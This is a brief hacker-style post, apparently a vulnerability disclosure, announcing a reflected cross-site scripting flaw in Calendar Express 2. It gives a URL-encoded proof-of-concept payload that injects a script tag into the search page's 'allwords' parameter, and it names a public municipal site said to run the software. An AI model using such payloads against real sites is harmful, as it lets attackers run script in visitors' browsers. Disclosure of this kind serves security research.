hey guys .. check out this new xss i just found ;P Vulnerable : Calendar Express 2 web : http://www.ci.emeryville.ca.us/calendar, http://www.phplite.com/products/calendarexpress/ XSS : http://127.0.0.1/calendar/search.php?allwords=%22%3E%3Cscript%3Ealert%28%27bl4ck%27%29%3C%2Fscript%3E&cid=1&title=1&desc=1 ################################ Discovered By BLacK ZeRo K.S.A bL4ck@xxxxxxxxxxx ################################ Best regards ,,